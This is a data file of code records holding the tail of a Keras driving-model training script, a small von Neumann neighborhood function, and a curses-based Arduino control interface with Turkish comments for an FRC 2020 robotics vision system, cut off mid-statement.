dropout\nmodel.add(Flatten())\nmodel.add(Dense(100))\nmodel.add(Dropout(0.5))\nmodel.add(act)\nmodel.add(Dense(50))\nmodel.add(Dropout(0.5))\nmodel.add(act)\nmodel.add(Dense(10))\nmodel.add(Dropout(0.5))\nmodel.add(act)\nmodel.add(Dense(1))\n# Mean squared error for loss function, and adam optimizer\nmodel.compile(loss='mse', optimizer='adam')\nmodel.fit_generator(train_generator, \n samples_per_epoch=len(train_samples)*4,\n validation_data=validation_generator,\n nb_val_samples=len(validation_samples)*4, \n nb_epoch=5)\n# save model\nmodel.save('model.h5')\nexit()","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"75172921","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom typing import *\n\n\ndef von_neumann_neighborhood(\n x: int,\n y: int,\n r: int,\n exclude_start_point: bool = True\n) -> Set[Tuple[int, int]]:\n \"\"\"http://mathworld.wolfram.com/vonNeumannNeighborhood.html\"\"\"\n result = set()\n f = result.update\n for i, j in enumerate([1 + 2 * i for i in range(r, -1, -1)]):\n f((+i + x, k + y) for k in range(-j // 2 + 1, j // 2 + 1))\n f((-i + x, k + y) for k in range(-j // 2 + 1, j // 2 + 1))\n\n if exclude_start_point:\n result.remove((x, y))\n\n return result\n","sub_path":"ludejo_py37/y2018/m10/d22/von_neumann_neighborhood.py","file_name":"von_neumann_neighborhood.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"31112081","text":"# region gereksiz yazilar\n#########################################################################################################\n###\n### WRITTEN BY:\n###\n### ColonelKai - Kayra Acar\n### TUNAPRO1234 - Tuna Gul\n### BLACKSHADOW - Siyabend Urun\n###\n### FRC 2020 - NightVision - Target Detection Algorithm\n###\n### NightFury#7839 (Adimiz su an farkli olabilir tartismalar hala devam ediyor)\n###\n#########################################################################################################\n\n\n# -->> . <<--NOKTAYI SILME KOD BOZULUYOR\n# /\\ HERKES LORD NOKTA KARSISINDA EGILSIN\n# | TANRIMIZ NOKTA\n# |\n# if you look to your above, you can see programmers going nuts\n\n\"\"\"#####################################################################################################################\"TODO\"\n \n 14/2 TAKIM NUMARASINA GoRE AYAR YAPIMI (OK)\n 14/2 SET UP LED CONTROLLING SYSTEM (For Interface)\n 14/2 Led kontrol icine robot ayarlari yazilma hatasini duzelt\n 14/2 FRC7839-NightVision yazisini yukari sag veya sol koseye yaz (COLONELKAI)\n 14/2 WRITE CURRENT SETTING RETURN TO MAIN MENU (COLONELKAI)\n 14/2 INFO menusu (Yazanlar - Tarih - Takim - vs) (COLONELKAI)\n 14/2 check_arduino() olustur ve key get icine koy\n 16/2 Panic mode icinde tekrar arduinoyu takmayi dene \n 16/2 Save ve get_setting icin handle_error()\n 16/2 handle_error mm modeunun kernel panicine errorleri yollasin (yarim ama is gorur)\n 17/2 TAKIM NUMARASI EKLEMEK IcIN ARDUINO CONFIGE AYAR EKLE (TUNAPRO1234 ve COLONELKAI)\n (button0'a her basildiginda sonraki rakama gececek)\n 17/2 SETTINGS MENUSUNE ANLIK DOSYA RESFRESHI \n 17/2 Settings dosyasina takim numarasini ekle \n 17-18/2 TEAM NUMBER YAZISI DA BEYAZ YANMALI\n 17-18/2 Led dosyasina is mm started ayarini ekle (Kamera algoritmasinin okuyup okumamasi gerektigini soylemek icin)\n 17-18/2 INFO MENuSu cALIsMIYOR\n (YALAN) Settings write error (TUNAPRO1234) \n 1/3 SSID MENUSU HALLEDILECEK (KAYRA) \n 28/2 CHECK PORTS LINUX ICIN DUZENLENECEK\n\n# THREADING ILE ARDUINONUN TAKILI OLUP OLMADIGI ANLASILACAK (KAYRA) \n\n# Match mode da iken led_camera kapatılmak istenirse yeşil led yanıp sönebilir (KAYRA)\n\n# BLUETOOTH COM PORT HATASI - bluetooth kapa mal (gelecekteki tuna)\n\n# MATCH MODE BASLATILABILIR OLMASINA RAGMEN MAVI LED YANIP SONUYOR\n\n# Yazilar uzerindeki turkce karakterleri kaldir (ç, ı, İ, ö, ş, ü, ğ)\n\"TODO\"########################################################################################################################\"\"\"\n\n###############################################################################################################################\n##\n##\n## Eger https://github.com/FRC7839/NightVision'deki ReadMe.md dosyasini okuduysaniz muhtemelen burayi okumaniza\n## gerek kalmayacaktir. Kodu istediginiz gibi kullanin sadece isim vermemeniz beni cidden uzerdi.\n##\n##\n## InputPlus.py Nedir Ne Ise Yarar Bu Yazilimi Kullanmak Icin Sebepler Nelerdir:\n##\n##\n## oncelikle eger bu yazilimi FRC2020 icin almayi dusunuyorsaniz cidden gecikme icin cooook ozur diliyorum.\n## Ama tatilde algoritmayi gelistirmesi icin biraz Siyabendi bekledim ve robot olmadigi icin servoyla farkli bir\n## prototip tasarlamam filan gerekti her neyse.\n##\n##\n## InputPlus.py sadece arayuz olmasi sebebiyle her sene tekrar kullanilabilecek bir koddur. Sadece algoritmayi\n## yenilemek sizin icin yeterli olacaktir. Kodu biraz incelersiniz hata vermemesi icin elimizden gelen her seyi\n## yaptigimizi gorebilirsiniz. Eger algilama ya da okuma gibi hatalar alirsaniz InputPlus, kendini PANIC MODE'a alir\n## ve ledin kapanmasini onleyip ayarlari dosyaya yazmaya calisir. Algoritmayla kod sadece bir JSON dosyasi uzerinden\n## iletisim kuruduklari icin herhangi bir yazilimin cokmesi digerinin de cokmesine sebep olmaz.\n##\n##\n## Programi yonetbilmek icin github sayfamizda aciklanan sekilde baglanmis bir adet arduino, bir adet potansiyometre,\n## iki adet regular push button ve ledlerin ve arduinonun girisi icin disi headerlar kullanilabilir. Ayrica bir adet\n## Raspberry pi, rpi icin ekran kullanmalisiniz (kap kullanmanizi oneririm).\n##\n##\n## Github sayfasini FRC 2020 Bosphorus Regional'dan sonra herkesin duzenlemesi icin public hale getirmeye calisacagim.\n##\n##\n#########################################################################################################\n## ##\n## --skip-camera-check : camera kontorlunu atliyor (Zaten windowsta kamera kontrolu yok) ##\n## --skip-network-check : ip adres kontrolunu atliyor (NOT CONNECTED TO RADIO Hatasi kapaniyor) ##\n## --pc-mode : skip camera ve skip networkun birlesimi ##\n## --test-mode : verilen hatalar programi durdurur (FRC esnasinda onermiyorum) ##\n## --pc-test-mode : pc ve test modunun birlesimi ##\n## ##\n#########################################################################################################\n\n\n###################### CURSES CALISMA MANTIGI ##################################################\n# ilk olarak get menu values functionlari bir array'a ekranda yazilacak her bir satiri atiyor. #\n# her satir bir element oluyor ve surekli olarak get menu values fonksiyonunu elementler #\n# uzerinde islem yapip onlari degistiriyor #\n# sonra print menu bunlari alip yerlerini hesapladiktan sonra ekrana yazdiriyor. #\n# bu bize get menu values kullanark ekrandaki goruntuyu aktif olarak degistirmemizi sagliyor. #\n################################################################################################\n\n# arduino_check_thread kullanımı\n# not: lütfen tüm değişkenleri okuma/yazma olaylarını \"Try/except\" içine alın thread başlamadı ise hata verir\n# thread başlatmak için: arduino_check_thread()\n# threadi durdurmak için: arduino_check_thread.exitthread = True (try except içine al)\n# thread'den değer okumak için (example yerine değerin yazılmasını istediğiniz değişken): example = arduino_check_thread.rv (try except içine al)\n\n#endregion\n\nfrom threading import Thread\nfrom frc_lib7839 import *\nimport threading\nimport pyfirmata\nimport curses\nimport json\nimport time\nimport sys\nimport os\n\n# region global\n\nglobal pc_test_mode\nglobal skip_cam_arg\nglobal skip_nt_arg\nglobal test_mode\nglobal pc_mode\n\n\npc_test_mode = InputPFunctions.find_arg(\"--pc-test-mode\", num=True)\ntest_mode = InputPFunctions.find_arg(\"--test-mode\", num=True)\npc_mode = InputPFunctions.find_arg(\"--pc-mode\", num=True)\nmatch_mode_can_be_started = False\ncheck_arduino_thread_rv = True\n\n\nif os.name == \"nt\":\n from frc_lib7839 import *\n pc_mode = 1\n\nif pc_mode is not None and os.name == \"posix\":\n sys.path.insert(1, '/home/pi/NightVision')\n from frc_lib7839 import *\n\n\nif pc_mode is not None:\n skip_cam_arg = 1\n skip_nt_arg = 1\n\nelif pc_test_mode is not None:\n pc_mode = 1\n skip_cam_arg = 1\n skip_nt_arg = 1\n test_mode = 1\n\nelse:\n skip_cam_arg = InputPFunctions.find_arg(\"--skip-camera-check\", num=True)\n skip_nt_arg = InputPFunctions.find_arg(\"--skip-network-check\", num=True)\n\n# endregion\n\n# DIKKAT\n# Match mode otonom yuzunden diger tum menulerden farkli bir print\n# fonksiyonuna ve getvalues'a ihtiyac duyuyor\n# match mode icin get menu values fonksiyonu\n\n\ndef match_mode(\n stdscr,\n settings=None,\n led_blue=None,\n led_camera=None,\n led_red=None,\n led_green=None,\n swt1=None,\n pot1=None,\n PanicMenu=False,\n errmsg=None,\n err_type=None,\n isReadError=False\n):\n # match mode, sadece durum raporu veren menü\n if not PanicMenu: # eğer error'suz başlatılmışsa\n try: # eğer açıksa yanıp sönen tüm led'leri kapat\n if flash_led.flashthreadopen:\n flash_led.exitthread = True\n except:\n pass\n \n led_blue.write(0) # mavi led kapalı\n led_green.write(1) # yeşil led açık\n # Ana yer\n while True:\n # Dosyadan okumayi dene\n #settings = DbFunctions.get_setting(file_s) # led control dosyasindan ayari cekiyor\n #handle_error(led_control, stdscr, PanicMenu=True)\n\n settings[\"Match Mode Status\"] = True\n # çıkmadan ayarları kaydet\n rv3 = DbFunctions.save_settings(file_s, settings)\n handle_error(rv3, stdscr, PanicMenu=True)\n\n handle_error(settings, stdscr, PanicMenu=True)\n \n m_menu_elements = [] # Menu elementleri arrayi\n m_menu_elements.append(\" ## MATCH MODE STARTED ## \") # Title\n\n # LED Bilgisayar tarafindan kontrol ediliyor ve menu bunu gosteriyor\n if settings[\"Led Status\"] is not None and settings[\"Led Status\"] in [\n True,\n False,\n \"True\",\n \"False\",\n ]:\n m_menu_elements.append(\n \" ## LED CONTROL : \" + str(settings[\"Led Status\"]) + \" ## \"\n )\n\n # Eger kapali ya da acik alamazsa error veriyor.\n else:\n m_menu_elements.append(\" ## LED CONTROL FAILED ## \")\n settings[\"Led Status\"] = True\n\n try:\n # Menunun geri kalani, durum reporu veriyor.\n m_menu_elements.append(\n \" ## TEAM_NUMBER : \" + str(settings[\"Team Number\"]) + \" ## \"\n )\n m_menu_elements.append(\n \" ## CAMERA_TOLERANCE : \"\n + str(settings[\"Camera Tolerance\"])\n + \" ## \"\n )\n m_menu_elements.append(\n \" ## ROBOT_LOCATION : \" + str(settings[\"Robot Location\"]) + \" ## \"\n )\n m_menu_elements.append(\n \" ## WAITING_PERIOD : \" + str(settings[\"Waiting Period\"]) + \" ## \"\n )\n m_menu_elements.append(\n \" ## AUTONOMOUS_MODE : \" + str(settings[\"Autonomous Mode\"]) + \" ## \"\n )\n\n except:\n handle_error(all_errors[READ_ERR], stdscr, PanicMenu=True)\n\n try:\n if flash_led.flashthreadopen: # eğer yanip sönen işik varsa kapatiyor\n flash_led.exitthread = True \n except:\n pass\n\n # led ayarlari\n if settings[\"Led Status\"] in [\"True\", True]: \n ArduinoFunctions.led_write(led_green, led_camera, 1) # on\n\n\n elif settings[\"Led Status\"] in [\"False\", False]:\n ArduinoFunctions.led_write(None, led_camera, 0) # off\n flash_led(led_green)\n\n else:\n ArduinoFunctions.led_write(led_green, led_camera, 1) # on\n\n # ekrana yazdıran fonksiyon\n print_menu_for_match(stdscr, m_menu_elements)\n \n time.sleep(3)\n # exit kodu\n if (\n ArduinoFunctions.map_x(pot1.read(), 0, 1, 0, max_v) == max_v\n and ArduinoFunctions.map_xi(swt1.read(), 0, 1, 0, max_v) == 0\n ):\n ArduinoFunctions.led_write(led_blue, led_camera, 1) # on\n led_green.write(0)\n\n settings[\"Match Mode Status\"] = False\n\n try: # eğer yanıp sönen led varsa kapat\n if flash_led.flashthreadopen:\n flash_led.exitthread = True \n except:\n pass\n # çıkmadan ayarları kaydet\n rv = DbFunctions.save_settings(file_s, settings)\n handle_error(rv, stdscr, PanicMenu=True)\n\n break\n\n ### KERNEL PANIC ###\n else: # panic modu açıksa\n\n try: # eğer yanıp sönen led var ise kapat\n if flash_led.flashthreadopen:\n flash_led.exitthread = True\n except:\n pass\n # arduino bağlandı mı kontrol etmek için ön hazırlık\n cp_p = ArduinoFunctions.check_ports()\n cp_c = cp_p\n \n try:\n led_red.write(1) # kırmızı ışığı yak\n except:\n pass\n \n settings = DbFunctions.get_setting(file_s)\n\n if handle_error(settings, stdscr, PanicMenu=False):\n settings = {}\n\n for i in range(len(setting_names)): \n setting_control[setting_names[i]] = setting_defaults[i]\n \n f_err = True\n\n m_menu_elements = [] # Menu elementleri arrayi\n m_menu_elements.append(\" ## PANIC MODE STARTED ## \") # Title\n\n # LED Bilgisayar tarafindan kontrol ediliyor ve menu bunu gosteriyor\n if settings[\"Led Status\"] is not None and settings[\"Led Status\"] in [True,False,\"True\",\"False\",]:\n m_menu_elements.append(\" ## LED CONTROL : \" + str(settings[\"Led Status\"]) + \" ## \")\n\n # Eger kapali yada acik alamazsa error veriyor.\n else:\n m_menu_elements.append(\" ## LED CONTROL FAILED ## \")\n\n led_control[\"Led Status\"] = True\n rv = DbFunctions.save_settings(file_s, settings) # Olmazsa yapacak bir sey yok\n handle_error(rv, stdscr, PanicMenu=False)\n\n if settings is not None:\n # Menunun geri kalani, durum reporu veriyor.\n try:\n m_menu_elements.append(\" ## TEAM_NUMBER : \" + str(settings[\"Team Number\"]) + \" ## \")\n m_menu_elements.append(\" ## CAMERA_TOLERANCE : \"+ str(settings[\"Camera Tolerance\"])+ \" ## \")\n m_menu_elements.append(\" ## ROBOT_LOCATION : \" + str(settings[\"Robot Location\"]) + \" ## \")\n m_menu_elements.append(\" ## WAITING_PERIOD : \" + str(settings[\"Waiting Period\"]) + \" ## \")\n m_menu_elements.append(\" ## AUTONOMOUS_MODE : \" + str(settings[\"Autonomous Mode\"]) + \" ##\")\n if not err_type is None:\n m_menu_elements.append(\" ## ERROR : \" + err_type + \" ## \")\n except:\n pass\n\n errortimer = threading.Timer(0.1, print_error, args=[stdscr, errmsg])\n errortimer.start()\n\n while True: # ana loop \n print_menu_for_match(stdscr, m_menu_elements) # ekrana yazdır\n time.sleep(1) \n\n if type(errmsg) == str and errmsg.startswith(\"InputP\"): # eğer error mesajı verilmiş ise\n print_info(stdscr, errmsg, color=2) # ekrana yazdır\n errmsg = None\n\n background_setup(stdscr, None, PanicMode=True) # arka planı kırmızı yapmak\n\n if type(err_type) == str and err_type == \"ARDUINO\": # eğer arduino error ise\n rv2 = ArduinoFunctions.check_ports() # portlari yeniden kontrol et\n\n try:\n if swt1.read() is None and rv2 != all_errors[ARDUINO_CONN_LOST]: # eğer switch error veriyor ve arduino bağlantısı bozuk\n isReadError = True # değilse iterator/read error\n else:\n isReadError = False\n except: # eğer swt objesi yoksa\n if rv2 != all_errors[ARDUINO_CONN_LOST]:\n try:\n DbFunctions.save_settings()\n\n except:\n isReadError = True\n else:\n isReadError = False\n else:\n isReadError = False\n\n # if not handle_error(rv2, stdscr, PanicMenu=False, clean=True) and not isReadError:\n # led_red.write(0)\n # not_main(stdscr)\n\n cp_c = ArduinoFunctions.check_ports()\n if cp_c != cp_p: # eğer şimdiki portlar önceden farklı ise yeni arduino bağlanmış demektir\n cp_p = cp_c\n \n if cp_c is not None and type(cp_c) == list and type(cp_c[0]) == str and not cp_c[0] == \"\":\n try:\n led_red.write(0)\n except:\n pass\n not_main(stdscr) # arduino'yu yeniden import etmeyi dene\n\ndef get_first_menu_values(team_ip2):\n # ana menü için değerleri hazırlayan kod\n ipaddr_func = InputPFunctions.get_ipaddr() # bağlı ipadresini alma\n check_cam_func = InputPFunctions.check_cam() # camera bağlı mı kontrol\n\n mainmenu = []\n mainmenucheck = []\n\n if skip_nt_arg is not None: # eğer network skip aktif ise atla\n mainmenu.append(\"SKIPPED NETWORK CHECKING\")\n mainmenucheck.append(True)\n\n elif ipaddr_func.startswith(\"127\"): # eğer localhost ise bağlamadı yaz\n mainmenu.append(\"IP ADRESS: NOT CONNECTED\")\n mainmenucheck.append(False) ## False\n\n elif not ipaddr_func.startswith(\"10.\" + team_ip2): # eğer takım radyosundan farklı bir yere bağlandıysa uyarı ver\n mainmenu.append(\"NOT CONNECTED TO RADIO\")\n mainmenucheck.append(False) ## False\n\n else: # başarılı şekilde bağlandı\n mainmenu.append(\"IP ADRESS: \" + ipaddr_func)\n mainmenucheck.append(True)\n\n mainmenu.append(\"SETTINGS\") # settings menüsü için button\n mainmenucheck.append(True)\n\n if skip_cam_arg is not None: # eğer kamera kontrol skip aktif ise atla\n mainmenu.append(\"SKIPPED CAMERA CHECKING\")\n mainmenucheck.append(True)\n\n elif (\n check_cam_func == \"CAMERA CONNECTED\" # eğer bağlı ise yada windows'ta ise\n or check_cam_func == \"TRUE BECAUSE WINDOWS\"\n ):\n mainmenu.append(check_cam_func) # başarılı!\n mainmenucheck.append(True)\n\n else:\n mainmenu.append(str(check_cam_func))\n mainmenucheck.append(False) ## False\n\n mainmenu.append(\"LED TEST\") # led test button\n mainmenucheck.append(True)\n\n mainmenu.append(\"INFO\") # info menüsü button\n mainmenucheck.append(True)\n\n mainmenu.append(\"REBOOT\") # linux'da bilgisayarı yeniden başlatan kod\n mainmenucheck.append(True)\n\n mainmenu.append(\"EXIT\") # çıkış butonu\n mainmenucheck.append(True)\n\n return [mainmenu, mainmenucheck]\n\n\ndef get_ip_menu_values(\n team_ip2,\n ipaddr_func=InputPFunctions.get_ipaddr(),\n):\n # ip menüsü için değerleri ayarlayan kod\n mainmenu = []\n mainmenu_status = []\n\n if skip_nt_arg is not None: # eğer network skip aktif ise atla\n mainmenu.append(\" ## SKIPPED NETWORK CHECKING ## \")\n mainmenu_status.append(False)\n\n else:\n mainmenu.append(\"\")\n mainmenu_status.append(False)\n\n mainmenu.append(\"HOSTNAME: \" + str(socket.gethostname())) # PC'nin ismi\n mainmenu.append(\"IP ADRESS: \" + ipaddr_func) # ip adress\n mainmenu.append(\"RADIO IP RANGE: 10.\" + team_ip2 + \".0/24\")\n\n mainmenu.append(\"OK\") # çıkış butonuu\n\n if str(socket.gethostname()) != \"frcvision\":\n mainmenu_status[0] = False\n\n if ipaddr_func.startswith(\"127\"):\n mainmenu_status.append(False)\n mainmenu_status.append(False)\n mainmenu[2] = \"IP ADRESS: NOT CONNECTED\"\n\n elif not ipaddr_func.startswith(\"10.\" + team_ip2):\n mainmenu_status.append(False)\n mainmenu_status.append(False)\n\n else:\n mainmenu_status.append(True)\n mainmenu_status.append(True)\n\n mainmenu_status.append(\"Normal\")\n mainmenu_status.append(\"Normal\")\n\n return [mainmenu, mainmenu_status]\n\n\ndef get_arduino_menu_values(settings):\n mainmenu = []\n mainmenu_status = []\n\n # ROBOT LOCATION\n if settings[\"Robot Location\"] is None:\n mainmenu.append(\"INPUT FOR ROBOT LOCATION\")\n mainmenu_status.append(False)\n\n else:\n mainmenu.append(\"ROBOT LOCATION: \" + settings[\"Robot Location\"])\n mainmenu_status.append(\"Normal\")\n\n # CAMERA TOLERANCE\n if settings[\"Camera Tolerance\"] is None:\n mainmenu.append(\"INPUT FOR CAMERA TOLERANCE\")\n mainmenu_status.append(False)\n\n else:\n mainmenu.append(\"CAMERA TOLERANCE: \" + settings[\"Camera Tolerance\"])\n mainmenu_status.append(\"Normal\")\n\n # WAITING PERIOD\n if settings[\"Waiting Period\"] is None:\n mainmenu.append(\"INPUT FOR WAITING PERIOD\")\n mainmenu_status.append(False)\n\n else:\n mainmenu.append(\"WAITING PERIOD: \" + settings[\"Waiting Period\"])\n mainmenu_status.append(\"Normal\")\n\n # AUTONOMOUS MODE\n if settings[\"Autonomous Mode\"] is None:\n mainmenu.append(\"INPUT FOR AUTONOMOUS MODE\")\n mainmenu_status.append(False)\n else:\n mainmenu.append(\"AUTONOMOUS MODE: \" + settings[\"Autonomous Mode\"])\n mainmenu_status.append(\"Normal\")\n\n if settings[\"Camera Offset\"] is None:\n mainmenu.append(\"INPUT FOR CAMERA OFFSET\")\n mainmenu_status.append(False)\n else:\n mainmenu.append(\"CAMERA OFFSET: mm\")\n mainmenu_status.append(\"Normal\")\n\n # mainmenu.append(\"\")\n mainmenu.append(\"TEAM NUMBER: \")\n mainmenu_status.append(True)\n\n # WRITE CURRENT SETTINGS AND OK BUTTONS\n mainmenu.append(\"WRITE CURRENT SETTINGS TO FILE\")\n mainmenu_status.append(\"Normal\")\n\n mainmenu.append(\"RETURN TO MAIN MENU\")\n mainmenu_status.append(False)\n\n return [mainmenu, mainmenu_status]\n\n\ndef get_cam_menu_values(isCamOnline=InputPFunctions.check_cam()):\n mainmenu = []\n mainmenu_status = []\n\n # # ILK ELEMENT (NETWORK TABLES)\n # if msg:\n # mainmenu.append(\"NETWORK TABLES CONNECTED\")\n # mainmenu_status.append(True)\n # if not msg:\n # mainmenu.append(\"NETWORK TABLES NOT CONNECTED\")\n # mainmenu_status.append(False)\n # else:\n # mianmenu.append(\"CAMERA NOT STARTED\")\n # mainmenu_status.append(False)\n\n # IKINCI ELEMENT (IS CAM ONLINE)\n if isCamOnline:\n mainmenu.append(\"CAMERA CONNECTED\")\n mainmenu_status.append(True)\n\n if not isCamOnline:\n mainmenu.append(\"CAMERA NOT CONNECTED\")\n mainmenu_status.append(False)\n\n # OK BUTTON\n mainmenu.append(\"OK\")\n mainmenu_status.append(\"Normal\")\n\n return [mainmenu, mainmenu_status]\n\n\ndef get_info_menu_values(teamnumber):\n menu = []\n menucheck = []\n\n menu.append(\"MADE FOR FRC 2020 SEASON\")\n menucheck.append(True)\n\n menu.append(\"TUNAPRO123\")\n menucheck.append(True)\n\n menu.append(\"ColonelKai\")\n menucheck.append(True)\n\n menu.append(\"BlackShadow\")\n menucheck.append(False)\n\n menu.append(\"NICE\")\n menucheck.append(True)\n\n return [menu, menucheck]\n\n\ndef print_info(stdscr, input_str, color=3):\n errortimer = threading.Timer(0.1, print_error, args=[stdscr, input_str, color])\n errortimer.start()\n\n\ndef print_error(stdscr, cur_stat, color=2, wait_time=5):\n # verilen error mesajunu verilen zaman (genellikle 5 sn) kadar en üste yazan kod\n starttime = time.perf_counter() # başlama zamanı\n while True: \n if type(cur_stat) == str: # eğer error mesajı direkt verildiyse direk yazdır\n errmsg = cur_stat\n if errmsg is not None:\n h, w = stdscr.getmaxyx()\n x = w // 2 - (len(errmsg) + 1) // 2\n y = h - 1\n stdscr.attron(curses.color_pair(color))\n stdscr.addstr(y, x, errmsg)\n stdscr.attroff(curses.color_pair(color))\n stdscr.refresh()\n\n elif cur_stat is not None: # eğer sözlük olarak verildiyse içinden alıp yazdır\n errmsg = cur_stat[\"current_error\"]\n\n if errmsg is not None:\n h, w = stdscr.getmaxyx()\n x = w // 2 - (len(errmsg) + 1) // 2\n y = h - 1\n stdscr.attron(curses.color_pair(2))\n stdscr.addstr(y, x, errmsg)\n stdscr.attroff(curses.color_pair(2))\n stdscr.refresh()\n\n elif cur_stat is None: # eğer ilisi de değilse boş yazdır\n h, w = stdscr.getmaxyx()\n x = (w // 2) - (1 // 2)\n y = h - 1\n stdscr.attron(curses.color_pair(2))\n stdscr.addstr(y, x, \"\")\n stdscr.attroff(curses.color_pair(2))\n stdscr.refresh()\n timenow = time.perf_counter() # verilen zamanı geçiyorsa kapat\n if timenow - starttime > wait_time:\n break\n\n\ndef print_cam_offset_edit(stdscr, team_n, cam_offset_pos, cur_stat):\n # ayarlar menüsünde camera offset'in 3 hanesini tek tek ayarlamak için olan özel kod\n if cam_offset_pos is not None:\n h, w = stdscr.getmaxyx() # ekranın genişliğini ve yüksekliğini bulur\n cam_offset_pos_list = [] \n\n for idx, i in enumerate(team_n): # burada team_n yazıyor ama başka kodumu copy-pasteledim aslında o cam_offset\n y = h // 2 # ekranın yükseklik olarak ortası\n x = w // 2 # ekranın genişlik olarak ortası\n\n x -=- 1 # x'e bir ekliyoruz \n\n if cur_stat[\"current_menu\"] == arduino_menu_value: # eğer ayarlar menüsünde isek\n\n if idx == 0: # eğer 1. hanede ise\n x = x + 4 # x'i 1. hanenin yerini bulmak için değiştir\n if cam_offset_pos == 0: # eğer 1. hane seçili ise\n stdscr.attron(curses.color_pair(1)) # renk beyaz\n stdscr.addstr(y, x, i) # 1. haneyi yazdır\n stdscr.attroff(curses.color_pair(1))\n else: # seçili değilse\n stdscr.attron(curses.color_pair(3)) # renk normal\n stdscr.addstr(y, x, i) # 1. haneyi yazdır\n stdscr.attroff(curses.color_pair(3))\n\n # alttakiler de 1. hane ile aynı prensip ile çalışıyor\n if idx == 1: # 2. hane\n x = x + 5\n if cam_offset_pos == 1:\n stdscr.attron(curses.color_pair(1))\n stdscr.addstr(y, x, i)\n stdscr.attroff(curses.color_pair(1))\n else:\n stdscr.attron(curses.color_pair(3))\n stdscr.addstr(y, x, i)\n stdscr.attroff(curses.color_pair(3))\n\n if idx == 2: # 3. hane\n x = x + 6\n if cam_offset_pos == 2:\n stdscr.attron(curses.color_pair(1))\n stdscr.addstr(y, x, i)\n stdscr.attroff(curses.color_pair(1))\n else:\n stdscr.attron(curses.color_pair(3))\n stdscr.addstr(y, x, i)\n stdscr.attroff(curses.color_pair(3))\n\n # burası kaldırıldı\n x = w // 2 # x'i yeniden hesaplıyor\n x = x - 9 \n stdscr.attron(curses.color_pair(3))\n # stdscr.addstr(y, x, \"TEAM NUMBER: \")\n stdscr.attroff(curses.color_pair(3))\n\n stdscr.refresh() # ekranı yeniliyor\n\n\ndef print_team_no_edit(stdscr, team_n, team_no_select, cur_stat):\n # print_cam_offset_edit ile aynısı, sadece konumu farklı ve 4 haneli\n if team_no_select is not None:\n h, w = stdscr.getmaxyx()\n for idx, i in enumerate(team_n):\n y = h // 2\n x = w // 2\n y -=- 1\n\n if cur_stat[\"current_menu\"] == arduino_menu_value:\n\n if idx == 0:\n x = x + 4\n if team_no_select == 0:\n stdscr.attron(curses.color_pair(1))\n stdscr.addstr(y, x, i)\n stdscr.attroff(curses.color_pair(1))\n else:\n stdscr.attron(curses.color_pair(3))\n stdscr.addstr(y, x, i)\n stdscr.attroff(curses.color_pair(3))\n\n if idx == 1:\n x = x + 5\n if team_no_select == 1:\n stdscr.attron(curses.color_pair(1))\n stdscr.addstr(y, x, i)\n stdscr.attroff(curses.color_pair(1))\n else:\n stdscr.attron(curses.color_pair(3))\n stdscr.addstr(y, x, i)\n stdscr.attroff(curses.color_pair(3))\n\n if idx == 2:\n x = x + 6\n if team_no_select == 2:\n stdscr.attron(curses.color_pair(1))\n stdscr.addstr(y, x, i)\n stdscr.attroff(curses.color_pair(1))\n else:\n stdscr.attron(curses.color_pair(3))\n stdscr.addstr(y, x, i)\n stdscr.attroff(curses.color_pair(3))\n\n if idx == 3:\n x = x + 7\n if team_no_select == 3:\n stdscr.attron(curses.color_pair(1))\n stdscr.addstr(y, x, i)\n stdscr.attroff(curses.color_pair(1))\n else:\n stdscr.attron(curses.color_pair(3))\n stdscr.addstr(y, x, i)\n stdscr.attroff(curses.color_pair(3))\n\n x = w // 2\n x = x - 9\n stdscr.attron(curses.color_pair(3))\n # stdscr.addstr(y, x, \"TEAM NUMBER: \")\n stdscr.attroff(curses.color_pair(3))\n\n stdscr.refresh()\n\n\ndef check_arduino_thread():\n global check_arduino_thread_rv\n # Devamlı olarak arduino'nun bağlantısını kontrol eden threaded kod.\n # not: threaded kodlardan beynim yok olmaya başladı\n check_arduino_thread.exitthread = False # bu fonksiyon kodun herhangi bir yerinde True olduğunda thread durucak kapa emri olarak kullanıyorum.\n\n # threaded olarak çalışacak fonksiyon\n def check_arduino_thread_actual(): #thread ile çalışacak kod\n global check_arduino_thread_rv\n check_arduino_thread.threadopen = True # thread'in açık olduğunu belirtiyor ki birden fazla thread açılmasın\n check_arduino_thread.exitthread = False # kapatma emrinin kapalı olduğunu kontrol ediyor\n while True: # asıl döngü\n rv = ArduinoFunctions.check_ports() # portları kontrol eden fonksiyon\n try:\n if type(rv) == list and rv[0] is None and rv[0] == \"\": # eğer liste boşsa false döndür\n # Bulunamadı\n check_arduino_thread_rv = False \n\n elif type(rv) == str and rv.startswith(\"InputP\"): # eğer check_ports fonkisyonu error döndürdü ise false döndür\n # ERROR\n check_arduino_thread_rv = False\n\n elif type(rv) == list and rv[0] is not None and type(rv[0]) == str and not rv[0] == \"\": # eğer boş değilse true döndür\n # bulundu\n check_arduino_thread_rv = True\n\n except: # eğer error verirse false döndür\n # bulunamadı\n check_arduino_thread_rv = False\n\n #thread kapama emri kontrolü\n if check_arduino_thread.exitthread: \n check_arduino_thread.exitthread = False \n break\n\n time.sleep(1) # thread fazla yüklemesin diye bekleme\n \n check_arduino_thread.threadopen = False # eğer threadin dışına çıkarsa threadin artık açık olmadığını söylüyor\n\n\n\n\n # Threadi çalıştıran kod. \n # timer kullanmamın sebebi bunu yazarken henüz threading'in nasıl çalıştığını bilmiyordum \n try:\n if not check_arduino_thread.threadopen: # eğer bir thread açık değilse aç\n arduino_check_timer = threading.Timer(0.1, check_arduino_thread_actual, [])\n arduino_check_timer.start()\n except: # eğer error verdiyse threadopen henüz verilmemiştir o yüzden yeni thread aç\n arduino_check_timer = threading.Timer(0.1, check_arduino_thread_actual, [])\n arduino_check_timer.start()\n\n\ndef flash_led(led):\n # obje olarak led verdiğin zaman dur komutuna kadar o ledi yakıp sönüyor\n # kodun geri kalanı check_arduino_thread() ile aynı mantıkla çalışıyor\n flash_led.exitthread = False \n def flash_led_actual(led):\n flash_led.flashthreadopen = True\n while True:\n time.sleep(0.5)\n ArduinoFunctions.led_write(led, None, 1)\n time.sleep(0.5)\n ArduinoFunctions.led_write(led, None, 0)\n if flash_led.exitthread:\n break\n flash_led.flashthreadopen = False\n \n try:\n if not flash_led.flashthreadopen:\n flash_timer = 